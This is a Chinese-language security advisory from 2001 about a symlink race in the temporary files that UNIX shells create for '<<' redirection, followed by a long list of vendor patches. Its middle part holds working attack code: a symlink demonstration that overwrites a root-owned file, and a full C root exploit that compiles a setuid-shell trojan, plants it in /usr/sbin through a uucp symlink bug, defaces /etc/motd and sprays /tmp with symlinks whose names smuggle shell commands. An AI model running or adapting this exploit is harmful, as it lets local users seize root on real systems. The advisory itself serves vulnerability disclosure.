UNIX SHELL重定向操作存在竞争条件漏洞发布时间:2001-11-28 更新时间:2001-11-28 严重程度:高 威胁程度:本地管理员权限 错误类型:竞争条件 利用方式:服务器模式 受影响系统 Apple MacOS X 10.0详细描述 bash, tcsh, cash, ksh 和 sh 是各种UNIX系统下的SHELL程序,其中存在一个漏洞可以允许攻击者可以任意写文件。 脚本和命令行如果使用<<作为重定向操作建立文件,会在/tmp目录下建立可猜测名字的临时文件,而且建立在/tmp目录下的文件没有检查文件是否存在,这样可以通过符号连接攻击者可以使用重定向操作用户权限来写任意文件。造成拒绝服务攻击或者权限提升。 测试代码 Paul Szabo <psz@maths.usyd.edu.au> : #!/bin/ksh -x touch /tmp/silly.1 ln -s /tmp/silly.1 /tmp/sh$$.1 ls -l /tmp/silly.* /tmp/sh$$.* cat <<EOF Just some short text EOF ls -l /tmp/silly.* /tmp/sh$$.* rm /tmp/silly.* /tmp/sh$$.* ------------------------sh exploit--------------------------------- /tmp# echo 'hello world' > rootfile /tmp# chmod 600 rootfile /tmp# ln -s rootfile sh$$ /tmp# chown -h 666.666 sh$$ /tmp# ls -l rootfile sh$$ -rw------- 1 root root 12 Oct 29 03:55 rootfile lrwxrwxrwx 1 666 666 8 Oct 29 03:56 sh12660 -> rootfile /tmp# cat <<BAR ? FOO ? BAR FOO o world /tmp# ls -l rootfile sh$$ /bin/ls: sh12660: No such file or directory -rw------- 1 root root 12 Oct 29 03:56 rootfile /tmp# cat rootfile FOO o world /tmp# --------------------------------------------------------------- /************************************************************** root exploit: multiple subsystem errors allowing root exploit bashack.c - Thu Nov 30 21:50:50 NZDT 2000 /etc/rc.d/ and scripts that are trusting the untrustworthy. /bin/sh acts silly when u get it to use the << redirection. it creates a mode 666 file with an easily predictable name, containing the pid as the only variant. As the same sequence of events happens at most start ups, the pid of the line in /etc/rc.d/rc.sysinit that creates the /boot/kernel.h file which uses << can be exploited. With another bit of bad it will take until the next run of cron.weekly till you have root. I'm sure someone can come up with a faster way. (hint: lotsa stuff run as root have /sbin and /usr/sbin in their paths. / is a pain when backticking, making it hard to tell the program what to run... FNAME below is a method of getting around that, but its ugly as sin ;]) [root@continuity /root]# rpm -qf /usr/bin/uucp uucp-1.06.1-20 [root@continuity /root]# rpm -qf /etc/rc.d/rc3.d chkconfig-1.0.7-2 initscripts-4.48-1 [root@continuity /root]# rpm -qf /bin/bash bash-1.14.7-16 [root@continuity /root]# rpm -qf /etc/cron.weekly/makewhatis.cron man-1.5g-6 The big bug is like the tcsh one someone mentioned a while ago. *****************************************************************/ #include <stdlib.h> #include <stdio.h> #define FNAME "/usr/man/man1/last.1.gz;export PATH=.;cd ..;cd ..;cd ..;cd ..;cd usr;cd sbin;uuconv;.1.gz" main() { int d; char fn[2000]; char *homedir; FILE *file; printf("bashack - root using multiple config/input validation errors\n\n"); printf("creating trojan in /usr/sbin/uuconv\n"); printf(" - uucp bug -\n"); printf("uucp follows symlinks as euid=uucp, (uid,gid,egid=you)\n\n"); homedir=getenv("HOME"); sprintf(fn,"%s/bashacker/",homedir); mkdir(fn); chdir(fn); sprintf(fn,"%s/bashacker/bashaker",homedir); unlink(fn); printf("== uuconv replacement\n"); printf("* making uuconv.c\n"); sprintf(fn,"%s/bashacker/uuconv.c",homedir); file=fopen(fn,"w"); sprintf(fn,"%s/bashacker",homedir); fprintf(file,"main()\n{\n"); fprintf(file,"printf(\"sendmail\n\");\n"); fprintf(file,"system(\"/bin/cp /bin/bash %s/bashacker;",fn); fprintf(file,"/bin/chmod 6711 %s/bashacker;",fn); fprintf(file,"echo hacked by %s>>/etc/motd;",getenv("LOGNAME")); fprintf(file,"echo -n \\\"at about \\\" >>/etc/motd; /bin/date >>/etc/motd"); fprintf(file,"\");\n"); fprintf(file,"}\n"); fclose(file); printf("* compiling ./uuconv.c ==> ./uuconv \n"); system("cc -o uuconv uuconv.c -O2;strip uuconv"); unlink("/var/spool/uucppublic/uuconv"); symlink("/usr/sbin/uuconv","/var/spool/uucppublic/uuconv"); printf("* copying to /usr/sbin via uucp bug\n"); sprintf(fn, "/usr/bin/uucp %s/bashacker/uuconv /var/spool/uucppublic/uuconv",homedir); system(fn); printf("== cleaning up a little.\n"); unlink("/var/spool/uucppublic/uuconv"); unlink("uuconv"); unlink("uuconv.c"); printf("== set up /tmp for bash part of exploit.\n"); for(d=100;d<150;d++) /* on my machine its something like 118-120 or something, but it does depend on what was running, or what files existed and stuff. so please excuse the shotgun approach. */ { sprintf(fn,"/tmp/t%d-sh",d); unlink(fn); symlink(FNAME,fn); } printf("* my work here is done.\n\n"); printf("now pray for some kinda of crash.\n\n\t--zen\n"); } 解决方案 尽快采用如下补丁程序: Caldera eServer 2.3: Caldera RPM eServer 2.3 bash-1.14.7-14.i386.rpm ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/bash-1.14.7-14.i386.rpm Caldera OpenLinux Desktop 2.3: Caldera RPM Desktop 2.3 bash-1.14.7-14.i386.rpm ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/bash-1.14.7-14.i386.rpm Caldera eDesktop 2.4: Caldera RPM eDesktop 2.4 bash-1.14.7-14.i386.rpm ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/ Conectiva Linux graficas: Conectiva RPM graficas i386 bash-1.14.7-26cl.i386.rpm ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/bash-1.14.7-26cl.i386.rpm Conectiva Linux ecommerce: Conectiva RPM ecommerce i386 bash-1.14.7-26cl.i386.rpm ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/bash-1.14.7-26cl.i386.rpm Conectiva Linux 4.0es: Conectiva RPM 4.0es i386 bash-1.14.7-24cl.i386.rpm ftp://atualizacoes.conectiva.com.br/4.0es/i386/bash-1.14.7-24cl.i386.rpm Conectiva Linux 4.0: Conectiva RPM 4.0 i386 bash-1.14.7-24cl.i386.rpm ftp://atualizacoes.conectiva.com.br/4.0/i386/bash-1.14.7-24cl.i386.rpm Conectiva Linux 4.1: Conectiva RPM 4.1 i386 bash-1.14.7-24cl.i386.rpm ftp://atualizacoes.conectiva.com.br/4.1/i386/bash-1.14.7-24cl.i386.rpm Conectiva Linux 4.2: Conectiva RPM 4.2 i386 bash-1.14.7-24cl.i386.rpm ftp://atualizacoes.conectiva.com.br/4.2/i386/bash-1.14.7-24cl.i386.rpm Conectiva Linux 5.0: Conectiva RPM 5.0 i386 bash-1.14.7-26cl.i386.rpm ftp://atualizacoes.conectiva.com.br/5.0/i386/bash-1.14.7-26cl.i386.rpm Conectiva Linux 5.1: Conectiva RPM 5.1 i386 bash-1.14.7-29cl.i386.rpm ftp://atualizacoes.conectiva.com.br/5.1/i386/bash-1.14.7-29cl.i386.rpm Digital (Compaq) TRU64/DIGITAL UNIX 5.0: FreeBSD FreeBSD 3.5.1: FreeBSD Upgrade ports-3 i386 bash-1.14.7.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/shells/bash-1.14.7.tgz FreeBSD FreeBSD 4.2: FreeBSD Upgrade ports-4 i386 bash-1.14.7.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/shells/bash-1.14.7.tgz FreeBSD Upgrade ports-4 alpha bash-1.14.7.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/shells/bash-1.14.7.tgz FreeBSD FreeBSD 5.0: FreeBSD Upgrade ports-5 i386 bash-1.14.7.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/shells/bash-1.14.7.tgz FreeBSD Upgrade ports-5 alpha bash-1.14.7.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/shells/bash-1.14.7.tgz HP HP-UX 9.0: HP HP-UX 11.11: MandrakeSoft Linux Mandrake 6.0: MandrakeSoft RPM 6.0 i386 bash1-1.14.7-19.1mdk.i586.rpm http://sunsite.ualberta.ca/pub/Mirror/Linux/mandrake/updates/6.0/RPMS/bash1-1.14.7-19.1mdk.i586.rpm MandrakeSoft Linux Mandrake 6.1: MandrakeSoft RPM 6.1 i386 bash1-1.14.7-19.1mdk.i586.rpm http://sunsite.ualberta.ca/pub/Mirror/Linux/mandrake/updates/6.1/RPMS/bash1-1.14.7-19.1mdk.i586.rpm MandrakeSoft Linux Mandrake 7.0: MandrakeSoft RPM 7.0 i386 bash1-1.14.7-19.1mdk.i586.rpm http://sunsite.ualberta.ca/pub/Mirror/Linux/mandrake/updates/7.0/RPMS/bash1-1.14.7-19.1mdk.i586.rpm MandrakeSoft Linux Mandrake 7.1: MandrakeSoft RPM 7.1 i386 bash1-1.14.7-21.1mdk.i586.rpm http://sunsite.ualberta.ca/pub/Mirror/Linux/mandrake/updates/7.1/RPMS/bash1-1.14.7-21.1mdk.i586.rpm MandrakeSoft Linux Mandrake 7.2: MandrakeSoft RPM 7.2 i386 bash1-1.14.7-24.1mdk.i586.rpm http://sunsite.ualberta.ca/pub/Mirror/Linux/mandrake/updates/7.2/RPMS/bash1-1.14.7-24.1mdk.i586.rpm Netscape Communicator 6.01a: RedHat Linux 5.2 sparc: Red Hat Inc. RPM 5.2 sparc bash-1.14.7-23.5x.sparc.rpm ftp://updates.redhat.com/5.2/sparc/bash-1.14.7-23.5x.sparc.rpm RedHat Linux 5.2 i386: Red Hat Inc. RPM 5.2 i386 bash-1.14.7-23.5x.i386.rpm ftp://updates.redhat.com/5.2/i386/bash-1.14.7-23.5x.i386.rpm RedHat Linux 5.2 alpha: Red Hat Inc. RPM 5.2 alpha bash-1.14.7-23.5x.alpha.rpm ftp://updates.redhat.com/5.2/alpha/bash-1.14.7-23.5x.alpha.rpm RedHat Linux 6.0 sparc: Red Hat Inc. RPM 6.2 sparc bash-1.14.7-23.6x.sparc.rpm ftp://updates.redhat.com/6.2/sparc/bash-1.14.7-23.6x.sparc.rpm RedHat Linux 6.0 i386: Red Hat Inc. RPM 6.2 i386 bash-1.14.7-23.6x.i386.rpm ftp://updates.redhat.com/6.2/i386/bash-1.14.7-23.6x.i386.rpm RedHat Linux 6.0 alpha: Red Hat Inc. RPM 6.2 alpha bash-1.14.7-23.6x.alpha.rpm ftp://updates.redhat.com/6.2/alpha/bash-1.14.7-23.6x.alpha.rpm RedHat Linux 6.1 sparc: Red Hat Inc. RPM 6.2 sparc bash-1.14.7-23.6x.sparc.rpm ftp://updates.redhat.com/6.2/sparc/bash-1.14.7-23.6x.sparc.rpm RedHat Linux 6.1 i386: Red Hat Inc. RPM 6.2 i386 bash-1.14.7-23.6x.i386.rpm ftp://updates.redhat.com/6.2/i386/bash-1.14.7-23.6x.i386.rpm RedHat Linux 6.1 alpha: Red Hat Inc. RPM 6.2 alpha bash-1.14.7-23.6x.alpha.rpm ftp://updates.redhat.com/6.2/alpha/bash-1.14.7-23.6x.alpha.rpm RedHat Linux 6.2E sparc: Red Hat Inc. RPM 6.2 sparc bash-1.14.7-23.6x.sparc.rpm ftp://updates.redhat.com/6.2/sparc/bash-1.14.7-23.6x.sparc.rpm RedHat Linux 6.2E i386: Red Hat Inc. RPM 6.2 i386 bash-1.14.7-23.6x.i386.rpm ftp://updates.redhat.com/6.2/i386/bash-1.14.7-23.6x.i386.rpm RedHat Linux 6.2E alpha: Red Hat Inc. RPM 6.2 alpha bash-1.14.7-23.6x.alpha.rpm ftp://updates.redhat.com/6.2/alpha/bash-1.14.7-23.6x.alpha.rpm RedHat Linux 6.2 sparc: Red Hat Inc. RPM 6.2 sparc bash-1.14.7-23.6x.sparc.rpm ftp://updates.redhat.com/6.2/sparc/bash-1.14.7-23.6x.sparc.rpm RedHat Linux 6.2 i386: Red Hat Inc. RPM 6.2 i386 bash-1.14.7-23.6x.i386.rpm ftp://updates.redhat.com/6.2/i386/bash-1.14.7-23.6x.i386.rpm RedHat Linux 6.2 alpha: Red Hat Inc. RPM 6.2 alpha bash-1.14.7-23.6x.alpha.rpm ftp://updates.redhat.com/6.2/alpha/bash-1.14.7-23.6x.alpha.rpm S.u.S.E. Linux 7.0: SCO Open Server 5.0: SCO Upgrade OpenServer shells.tar.Z ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/ SCO Open Server 5.0.1: SCO Upgrade OpenServer shells.tar.Z ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/ SCO Open Server 5.0.2: SCO Upgrade OpenServer shells.tar.Z ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/ SCO Open Server 5.0.3: SCO Upgrade OpenServer shells.tar.Z ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/ SCO Open Server 5.0.4: SCO Upgrade OpenServer shells.tar.Z ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/ SCO Open Server 5.0.5: SCO Upgrade OpenServer shells.tar.Z ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/ SCO Open Server 5.0.6a: SCO Upgrade OpenServer shells.tar.Z ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/ SCO Open Server 5.0.6: SCO Upgrade OpenServer shells.tar.Z ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/ SGI IRIX 6.5: SGI Upgrade IRIX 6.5.14 Maintenance Release http://support.sgi.com/colls/patches/tools/relstream/index.html SGI IRIX 6.5.1: SGI Upgrade IRIX 6.5.14 Maintenance Release http://support.sgi.com/colls/patches/tools/relstream/index.html SGI IRIX 6.5.2: SGI Upgrade IRIX 6.5.14 Maintenance Release http://support.sgi.com/colls/patches/tools/relstream/index.html SGI IRIX 6.5.3: SGI Upgrade IRIX 6.5.14 Maintenance Release http://support.sgi.com/colls/patches/tools/relstream/index.html SGI IRIX 6.5.4: SGI Upgrade IRIX 6.5.14 Maintenance Release http://support.sgi.com/colls/patches/tools/relstream/index.html SGI IRIX 6.5.5: SGI Upgrade IRIX 6.5.14 Maintenance Release http://support.sgi.com/colls/patches/tools/relstream/index.html SGI IRIX 6.5.6: SGI Upgrade IRIX 6.5.14 Maintenance Release http://support.sgi.com/colls/patches/tools/relstream/index.html SGI IRIX 6.5.7: SGI Upgrade IRIX 6.5.14 Maintenance Release http://support.sgi.com/colls/patches/tools/relstream/index.html SGI IRIX 6.5.8: SGI Upgrade IRIX 6.5.14 Maintenance Release http://support.sgi.com/colls/patches/tools/relstream/index.html SGI IRIX 6.5.9: SGI Upgrade IRIX 6.5.14 Maintenance Release http://support.sgi.com/colls/patches/tools/relstream/index.html SGI IRIX 6.5.10: SGI Upgrade IRIX 6.5.14 Maintenance Release http://support.sgi.com/colls/patches/tools/relstream/index.html SGI IRIX 6.5.11: SGI Upgrade IRIX 6.5.14 Maintenance Release http://support.sgi.com/colls/patches/tools/relstream/index.html SGI IRIX 6.5.12: SGI Upgrade IRIX 6.5.14 Maintenance Release http://support.sgi.com/colls/patches/tools/relstream/index.html SGI IRIX 6.5.13: SGI Upgrade IRIX 6.5.14 Maintenance Release http://support.sgi.com/colls/patches/tools/relstream/index.html Sun Solaris 2.5.1: Sun Solaris 2.6: Sun Solaris 7.0: tcsh tcsh 6.7.2: Debian Upgrade 2.2 alpha tcsh-kanji_6.09.00-10_alpha.deb http://security.debian.org/dists/stable/updates/main/binary-alpha/tcsh-kanji_6.09.00-10_alpha.deb Trustix RPM 1.0/1.1 tcsh-6.09-5tr.i586 ftp://ftp.trustix.net/pub/Trustix/updates/tcsh-6.09-5tr.i586.rpm Debian Upgrade 2.2 alpha tcsh_6.09.00-10_alpha.deb http://security.debian.org/dists/stable/updates/main/binary-alpha/tcsh_6.09.00-10_alpha.deb Debian Upgrade 2.2 arm tcsh-kanji_6.09.00-10_arm.deb http://security.debian.org/dists/stable/updates/main/binary-arm/tcsh-kanji_6.09.00-10_arm.deb Debian Upgrade 2.2 arm tcsh_6.09.00-10_arm.deb http://security.debian.org/dists/stable/updates/main/binary-arm/tcsh_6.09.00-10_arm.deb Debian Upgrade 2.2 (Intel): tcsh-kanji_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-i386/tcsh-kanji_6.09.00-10_i386.deb Debian Upgrade 2.2 (Intel): tcsh_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-i386/tcsh_6.09.00-10_i386.deb Debian Upgrade 2.2 (m68k): tcsh-kanji_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-m68k/tcsh-kanji_6.09.00-10_m68k.deb Debian Upgrade 2.2 (m68k): tcsh_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-m68k/tcsh_6.09.00-10_m68k.deb Debian Upgrade 2.2 (ppc): tcsh-kanji_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-powerpc/tcsh-kanji_6.09.00-10_powerpc.deb Debian Upgrade 2.2 (ppc): tcsh_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-powerpc/tcsh_6.09.00-10_powerpc.deb Debian Upgrade 2.2 (Sparc): tcsh-kanji_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-sparc/tcsh-kanji_6.09.00-10_sparc.deb Debian Upgrade 2.2 (Sparc): tcsh_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-sparc/tcsh_6.09.00-10_sparc.deb tcsh tcsh 6.8.00: Debian Upgrade 2.2 alpha tcsh-kanji_6.09.00-10_alpha.deb http://security.debian.org/dists/stable/updates/main/binary-alpha/tcsh-kanji_6.09.00-10_alpha.deb Trustix RPM 1.0/1.1 tcsh-6.09-5tr.i586 ftp://ftp.trustix.net/pub/Trustix/updates/tcsh-6.09-5tr.i586.rpm Debian Upgrade 2.2 alpha tcsh_6.09.00-10_alpha.deb http://security.debian.org/dists/stable/updates/main/binary-alpha/tcsh_6.09.00-10_alpha.deb Debian Upgrade 2.2 arm tcsh-kanji_6.09.00-10_arm.deb http://security.debian.org/dists/stable/updates/main/binary-arm/tcsh-kanji_6.09.00-10_arm.deb Debian Upgrade 2.2 arm tcsh_6.09.00-10_arm.deb http://security.debian.org/dists/stable/updates/main/binary-arm/tcsh_6.09.00-10_arm.deb Debian Upgrade 2.2 (Intel): tcsh-kanji_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-i386/tcsh-kanji_6.09.00-10_i386.deb Debian Upgrade 2.2 (Intel): tcsh_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-i386/tcsh_6.09.00-10_i386.deb Debian Upgrade 2.2 (m68k): tcsh-kanji_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-m68k/tcsh-kanji_6.09.00-10_m68k.deb Debian Upgrade 2.2 (m68k): tcsh_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-m68k/tcsh_6.09.00-10_m68k.deb Debian Upgrade 2.2 (ppc): tcsh-kanji_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-powerpc/tcsh-kanji_6.09.00-10_powerpc.deb Debian Upgrade 2.2 (ppc): tcsh_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-powerpc/tcsh_6.09.00-10_powerpc.deb Debian Upgrade 2.2 (Sparc): tcsh-kanji_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-sparc/tcsh-kanji_6.09.00-10_sparc.deb Debian Upgrade 2.2 (Sparc): tcsh_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-sparc/tcsh_6.09.00-10_sparc.deb Conectiva RPM 4.0 i386 tcsh-6.08.00-7cl.i386.rpm ftp://atualizacoes.conectiva.com.br/4.0/i386/tcsh-6.08.00-7cl.i386.rpm Conectiva RPM 4.0es i386 tcsh-6.08.00-7cl ftp://atualizacoes.conectiva.com.br/4.0es/i386/tcsh-6.08.00-7cl.i386.rpm Conectiva RPM 4.1 i386 tcsh-6.09.00-7cl ftp://atualizacoes.conectiva.com.br/4.1/i386/tcsh-6.09.00-7cl.i386.rpm Conectiva RPM 4.2 i386 tcsh-6.09.00-7cl ftp://atualizacoes.conectiva.com.br/4.2/i386/tcsh-6.09.00-7cl.i386.rpm Conectiva RPM 5.0 i386 tcsh-6.09.00-7cl ftp://atualizacoes.conectiva.com.br/5.0/i386/tcsh-6.09.00-7cl.i386.rpm Conectiva RPM 5.1 i386 tcsh-6.09.00-7cl ftp://atualizacoes.conectiva.com.br/5.1/i386/tcsh-6.09.00-7cl.i386.rpm Conectiva RPM ecommerce i386 tcsh-6.09.00-7cl ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/tcsh-6.09.00-7cl.i386.rpm Conectiva RPM graficas i386 tcsh-6.09.00-7cl ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/tcsh-6.09.00-7cl.i386.rpm tcsh tcsh 6.9.00: Debian Upgrade 2.2 alpha tcsh-kanji_6.09.00-10_alpha.deb http://security.debian.org/dists/stable/updates/main/binary-alpha/tcsh-kanji_6.09.00-10_alpha.deb Red Hat Inc. RPM 5.2 alpha tcsh-6.10-0.5.x ftp://updates.redhat.com/5.2/alpha/tcsh-6.10-0.5.x.alpha.rpm Debian Upgrade 2.2 (Intel): tcsh-kanji_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-i386/tcsh-kanji_6.09.00-10_i386.deb Debian Upgrade 2.2 (Intel): tcsh_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-i386/tcsh_6.09.00-10_i386.deb Debian Upgrade 2.2 (m68k): tcsh-kanji_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-m68k/tcsh-kanji_6.09.00-10_m68k.deb Debian Upgrade 2.2 (m68k): tcsh_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-m68k/tcsh_6.09.00-10_m68k.deb Debian Upgrade 2.2 (ppc): tcsh-kanji_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-powerpc/tcsh-kanji_6.09.00-10_powerpc.deb Debian Upgrade 2.2 (ppc): tcsh_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-powerpc/tcsh_6.09.00-10_powerpc.deb Debian Upgrade 2.2 (Sparc): tcsh-kanji_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-sparc/tcsh-kanji_6.09.00-10_sparc.deb Debian Upgrade 2.2 (Sparc): tcsh_6.09.00-10 http://security.debian.org/dists/stable/updates/main/binary-sparc/tcsh_6.09.00-10_sparc.deb Red Hat Inc. RPM 5.2 sparc tcsh-6.10-0.5.x ftp://updates.redhat.com/5.2/sparc/tcsh-6.10-0.5.x.sparc.rpm Red Hat Inc. RPM 5.2 i386 tcsh-6.10-0.5.x ftp://updates.redhat.com/5.2/i386/tcsh-6.10-0.5.x.i386.rpm Red Hat Inc. RPM 6.0 sparc tcsh-6.10-0.6.x ftp://updates.redhat.com/6.0/sparc/tcsh-6.10-0.6.x.sparc.rpm Red Hat Inc. RPM 6.0 i386 tcsh-6.10-0.6.x ftp://updates.redhat.com/6.0/i386/tcsh-6.10-0.6.x.i386.rpm Red Hat Inc. RPM 6.0 alpha tcsh-6.10-0.6.x ftp://updates.redhat.com/6.0/alpha/tcsh-6.10-0.6.x.alpha.rpm Red Hat Inc. RPM 6.1 alpha tcsh-6.10-0.6.x ftp://updates.redhat.com/6.1/alpha/tcsh-6.10-0.6.x.alpha.rpm Red Hat Inc. RPM 6.1 sparc tcsh-6.10-0.6.x ftp://updates.redhat.com/6.1/sparc/tcsh-6.10-0.6.x.sparc.rpm Red Hat Inc. RPM 6.1 i386 tcsh-6.10-0.6.x ftp://updates.redhat.com/6.1/i386/tcsh-6.10-0.6.x.i386.rpm Red Hat Inc. RPM 6.2 alpha tcsh-6.10-0.6.x ftp://updates.redhat.com/6.2/alpha/tcsh-6.10-0.6.x.alpha.rpm Red Hat Inc. RPM 6.2 sparc tcsh-6.10-0.6.x ftp://updates.redhat.com/6.2/sparc/tcsh-6.10-0.6.x.sparc.rpm Red Hat Inc. RPM 6.2 i386 tcsh-6.10-0.6.x ftp://updates.redhat.com/6.2/i386/tcsh-6.10-0.6.x.i386.rpm Red Hat Inc. RPM 7.0 alpha tcsh-6.10-1 ftp://updates.redhat.com/7.0/alpha/tcsh-6.10-1.alpha.rpm Red Hat Inc. RPM 7.0 i386 tcsh-6.10-1 ftp://updates.redhat.com/7.0/i386/tcsh-6.10-1.i386.rpm Caldera RPM OpenLinux 2.3 tcsh-6.10.00-2 ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/tcsh-6.10.00-2.i386.rpm Caldera RPM OpenLinux 2.3: tcsh-doc-html-6.10.00-2 ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/tcsh-doc-html-6.10.00-2.i386.rpm Caldera RPM eServer 2.3/eBuilder 3.0: tcsh-6.10.00-2 ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/tcsh-6.10.00-2.i386.rpm Caldera RPM eServer 2.3/eBuilder 3.0: tcsh-doc-html-6.10.00-2 ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/tcsh-doc-html-6.10.00-2.i386.rpm Caldera RPM eDesktop 2.4: tcsh-6.10.00-2 ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/tcsh-6.10.00-2.i386.rpm Caldera RPM eDesktop 2.4: tcsh-doc-html-6.10.00-2 ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/tcsh-doc-html-6.10.00-2.i386.rpm Trustix RPM 1.0/1.1 tcsh-6.09-5tr.i586 ftp://ftp.trustix.net/pub/Trustix/updates/tcsh-6.09-5tr.i586.rpm Debian Upgrade 2.2 alpha tcsh_6.09.00-10_alpha.deb http://security.debian.org/dists/stable/updates/main/binary-alpha/tcsh_6.09.00-10_alpha.deb Debian Upgrade 2.2 arm tcsh-kanji_6.09.00-10_arm.deb http://security.debian.org/dists/stable/updates/main/binary-arm/tcsh-kanji_6.09.00-10_arm.deb Debian Upgrade 2.2 arm tcsh_6.09.00-10_arm.deb http://security.debian.org/dists/stable/updates/main/binary-arm/tcsh_6.09.00-10_arm.deb Kris Kennaway Patch tcsh.patch http://www.securityfocus.com/data/vulnerabilities/patches/tcsh.patch Wirex Immunix OS 6.2: Wirex RPM 6.2 i386 bash-1.14.7-23.6x_StackGuard.i386.rpm http://www.immunix.org/ImmunixOS/6.2/updates/RPMS/bash-1.14.7-23.6x_StackGuard.i386.rpm 相关信息 参考:http://www.kb.cert.org/vuls/id/10277 |
